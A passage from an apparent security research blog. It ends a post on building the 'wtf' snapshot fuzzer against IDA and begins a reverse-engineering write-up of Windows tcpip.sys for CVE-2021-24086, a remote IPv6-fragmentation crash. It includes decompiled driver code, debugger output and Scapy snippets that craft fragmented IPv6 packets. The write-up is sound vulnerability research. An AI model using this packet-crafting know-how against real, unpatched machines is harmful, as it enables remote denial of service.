             "carrying on..\n");
}
```

To make it work, you have to program the APIC a little, and I remember struggling to get the interruption fired. I am still not 100% sure I got all the details right, but the interruption triggered consistently during my tests, so I called it a day. I would also like to revisit this area in the future, as there might be other features I could use for the fuzzer.

## Problem 9: Running it in the cloud

The KVM backend was developed on a laptop, in a Hyper-V VM with nested virtualization on. It worked great, but it was not powerful, and I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers supporting nested virtualization and that only Microsoft's Azure had SKUs with nested virtualization on.
I rented one of them to try it out, but the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered, but it had to do with real mode & the APIC and the way I create memory slots; I had developed the backend assuming this feature would be present, so I didn't use Azure either. Instead, I rented a bare-metal server on Vultr for about $100/mo. The CPU was a Xeon E3-1270v6: 4 cores, 8 threads @ 3.8GHz, which seemed good enough for my usage. The machine had a PMU, and that is where I developed wtf's support for it as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0


To give you more details: this test case generated executions of around 195 million instructions, with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
Dirty pages: 9166848 bytes (0 MB)
Memory accesses: 411196757 bytes (24 MB)


Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I had acquired a fairly large corpus made of the weirdest ELFs possible: 1.6 million files that I now needed to minset. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like that idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator; it distributes test cases to clients and receives code coverage reports from them. The clients are simply runners that send results back to the server, and all the important state is kept server-side.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr
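The server-side logic this distributed minset relies on boils down to a greedy cover: a test case earns its place in the corpus only if its coverage report contains at least one never-seen-before address. A hypothetical sketch of that accounting (`CorpusServer_t` is an illustration, not wtf's actual code):

```cpp
#include <cassert>
#include <cstdint>
#include <set>
#include <vector>

// Hypothetical sketch of the server-side minset accounting: the server owns
// the aggregate coverage set; a client's test case is kept in the corpus only
// if the coverage report it sends back adds at least one new address.
class CorpusServer_t {
  std::set<uint64_t> Coverage_;
  uint64_t CorpusSize_ = 0;

public:
  // Returns true if the test case brought new coverage and was kept.
  bool OnCoverageReport(const std::vector<uint64_t> &Report) {
    bool New = false;
    for (const uint64_t Address : Report) {
      // insert().second is true only for addresses we had never seen.
      New |= Coverage_.insert(Address).second;
    }
    if (New) {
      CorpusSize_++;
    }
    return New;
  }

  uint64_t CorpusSize() const { return CorpusSize_; }
  uint64_t Coverage() const { return Coverage_.size(); }
};
```

Because the coverage set lives in one place, any number of clients can report concurrently processed files and the resulting minset stays consistent, which is what lets the wall-clock time drop from weeks to hours.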


# Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereferences, stack-overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following GitHub repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend you try out their bounty, as I am sure there's a lot to be found.

# Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

15 April 2021 at 15:00

# Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On Tuesday October 13th 2020, Microsoft released a patch for CVE-2020-16898, a vulnerability affecting Windows' tcpip.sys kernel-mode driver, dubbed Bad Neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.


The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Not having diffed Microsoft patches in years, I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it, as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and publish a blogpost that I didn't even have time to start; oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

# TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  // ...
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
    IppReassemblyNetBufferListsComplete,
    Reassembly,
    0,
    0,
    0,
    0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  // ...
  *Buffer = Reassembly->Ipv6;


A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated, which allows an attacker to trigger a special condition in NdisGetDataBuffer and make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL; Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugcheck looks like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen


For anybody else in for a long ride, let's get to it :)

# Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less covered (or not covered at all) in his post, such as tcpip.sys internals.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

• There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
• Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
• One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information, due to the fact that Microsoft seems to have privately shared PoCs with their partners via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-24086) as a first step. I figured it might be easier to trigger, that I might be able to use the acquired knowledge to understand tcpip.sys better, and maybe work on the other ones if time and motivation allowed.

The next logical step is to diff the patches to identify the fixes.

# Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

# Reverse-engineering tcpip.sys

This is where the real journey starts, along with the usual emotional rollercoaster that comes with studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, was I wrong.

## Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), and created a virtual switch which the two VMs share. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sight - no big surprise there; it implements Windows' IPv4 & IPv6 network stacks after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')


This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8022edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
# Call Site
00 tcpip!Ipv6pReassembleDatagram
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx


We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up and top-down approaches, and loads of experiments. Commenting the decompiled code as best I can, challenging myself by asking questions, answering them, rinse & repeat.

## High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer that seems to be related to something that got received, and we want to set it to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try, but time to switch gears.

### Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from, but maybe we don't need to. One of the first questions you might ask yourself is how the kernel stores network data. What structures does it use?

#### NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
+0x000 Next             : Ptr64 _NET_BUFFER
+0x008 CurrentMdl       : Ptr64 _MDL
+0x010 CurrentMdlOffset : Uint4B
+0x018 DataLength       : Uint4B
+0x018 stDataLength     : Uint8B
+0x020 MdlChain         : Ptr64 _MDL
+0x028 DataOffset       : Uint4B
+0x030 ChecksumBias     : Uint2B
+0x032 Reserved         : Uint2B
+0x038 NdisPoolHandle   : Ptr64 Void
+0x040 NdisReserved     : [2] Ptr64 Void
+0x050 ProtocolReserved : [6] Ptr64 Void
+0x080 MiniportReserved : [4] Ptr64 Void
+0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
+0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST


It can look overwhelming but we don't need to understand every detail. What is important is that the network data is stored in a regular MDL. Like MDLs, NET_BUFFERs can be chained together, which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
+0x000 Next             : Ptr64 _MDL
+0x008 Size             : Int2B
+0x00a MdlFlags         : Int2B
+0x00c AllocationProcessorNumber : Uint2B
+0x00e Reserved         : Uint2B
+0x010 Process          : Ptr64 _EPROCESS
+0x018 MappedSystemVa   : Ptr64 Void
+0x020 StartVa          : Ptr64 Void
+0x028 ByteCount        : Uint4B
+0x02c ByteOffset       : Uint4B


NET_BUFFER_LIST is basically a structure to keep track of a list of NET_BUFFERs, as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
+0x000 Next             : Ptr64 _NET_BUFFER_LIST
+0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
+0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
+0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
+0x020 NdisPoolHandle   : Ptr64 Void
+0x030 NdisReserved     : [2] Ptr64 Void
+0x040 ProtocolReserved : [4] Ptr64 Void
+0x060 MiniportReserved : [2] Ptr64 Void
+0x070 Scratch          : Ptr64 Void
+0x078 SourceHandle     : Ptr64 Void
+0x080 NblFlags         : Uint4B
+0x084 ChildRefCount    : Int4B
+0x088 Flags            : Uint4B
+0x08c Status           : Int4B
+0x08c NdisReserved2    : Uint4B
+0x090 NetBufferListInfo : [29] Ptr64 Void


Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.
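To keep those concepts straight, here is a toy Python model of a network buffer backed by a chain of chunks. This is purely illustrative; it only mirrors the idea that the data lives in non-contiguous pieces and that a request for more bytes than are available must fail:

```python
class ToyNetBuffer:
    """Toy model: the chunks play the role of the MDL chain and
    data_length plays the role of NET_BUFFER.DataLength."""
    def __init__(self, chunks):
        self.chunks = list(chunks)
        self.data_length = sum(len(c) for c in chunks)

    def get_data_buffer(self, bytes_needed):
        # Asking for zero bytes or for more bytes than available fails,
        # conceptually like NdisGetDataBuffer returning NULL.
        if bytes_needed == 0 or self.data_length < bytes_needed:
            return None
        return b''.join(self.chunks)[:bytes_needed]

nb = ToyNetBuffer([b'\x11' * 4, b'\x22' * 4])
assert nb.get_data_buffer(6) == b'\x11' * 4 + b'\x22' * 2
assert nb.get_data_buffer(9) is None
```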

#### The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works. I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can be chained together; each layer tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet in the list:

if ( Packet )
{
  do
  {
    Next = Packet->Next;
    Packet->Next = 0;
    IppReceiveHeadersHelper(Packet, Protocol, ...);
    Packet = Next;
  }
  while ( Next );
}


Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure, and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions read and update it during parsing.

NetBufferList = Packet->NetBufferList;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
  Va = CurrentMdl->MappedSystemVa;
else
  Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
  // ...
}
else
{
  // ...
}


The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};


NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
  NetBufferList = RcvList->NetBufferList;
  if ( ... )
  {
    Demuxer = (Demuxer_t *)IpUdpEspDemux;
  }
  else
  {
    Demuxer = &Protocol->Demuxers[IpProto];
  }
  if ( ... )
    Demuxer = 0;
  if ( Demuxer )
    Demuxer->Parse(RcvList);
  else
    RcvList = RcvList->Next;
}


Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come in handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions


Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.
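To make the dispatch mechanism concrete, here is a toy Python model of the NextHeader-driven parsing loop described above. The protocol numbers match the demuxer table we dumped; everything else is made up:

```python
def make_handler(name):
    def handler(packet):
        packet['parsed'].append(name)
        # The real Parse callback consumes the extension header and
        # updates NextHeader; here the "wire" is just a list of numbers.
        return packet['wire'].pop(0)
    return handler

DEMUXERS = {
    0:  make_handler('hop-by-hop'),    # Ipv6pReceiveHopByHopOptions
    44: make_handler('fragment'),      # Ipv6pReceiveFragmentList
    60: make_handler('dest-options'),  # Ipv6pReceiveDestinationOptions
}

def receive(packet):
    next_header = packet['wire'].pop(0)
    # Keep dispatching while the next header is a known extension header.
    while next_header in DEMUXERS:
        next_header = DEMUXERS[next_header](packet)
    return next_header  # upper-layer protocol number, e.g. 17 for UDP

pkt = {'wire': [0, 60, 44, 17], 'parsed': []}
assert receive(pkt) == 17
assert pkt['parsed'] == ['hop-by-hop', 'dest-options', 'fragment']
```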

#### The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit better, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that complexity, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]


The most important fields for us are:

• offset, which tells the start offset of where the data that follows this header should be placed in the reassembled packet,
• the m bit, which specifies whether or not this is the last fragment.

Note that the offset field is expressed in 8-byte blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, it'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly; I enjoy learning through practice (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags


Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It is also the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:
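To make the offset arithmetic and the stitching concrete, here is a toy reassembly routine (illustrative only; it assumes the fragments are complete and non-overlapping):

```python
def reassemble(unfragmentable, fragments):
    """Toy reassembly: fragments are (offset, data) tuples where offset
    is expressed in 8-byte blocks, like in the fragmentation header."""
    total = max(off * 8 + len(data) for off, data in fragments)
    buf = bytearray(total)
    for off, data in fragments:
        buf[off * 8: off * 8 + len(data)] = data
    # The reassembled packet is the unfragmentable part followed by
    # the stitched-together fragmentable part.
    return unfragmentable + bytes(buf)

# Fragments can arrive out of order; the offsets put them back in place.
assert reassemble(b'HDR', [(1, b'B' * 8), (0, b'A' * 8)]) == b'HDR' + b'A' * 8 + b'B' * 8
```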

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

At this point, I felt I had accumulated enough new information and it was time to zoom back in on the target. We want to verify that reality works like the literature says it does, and by doing so we will improve our overall understanding. After studying this code for a while, we start to understand the big lines. The function receives a Packet, but as this structure is packet-specific, it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up into three main parts; again, no need for us to understand every single detail, let's just understand it conceptually and what/how it tries to achieve its goals:

• 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = 8i64;
  H = RtlCompute37Hash(g_37HashSeed, Pkt + OffsetSrcIp, AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = 24i64;
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}

• 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
  PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}


• 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

• 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
  }
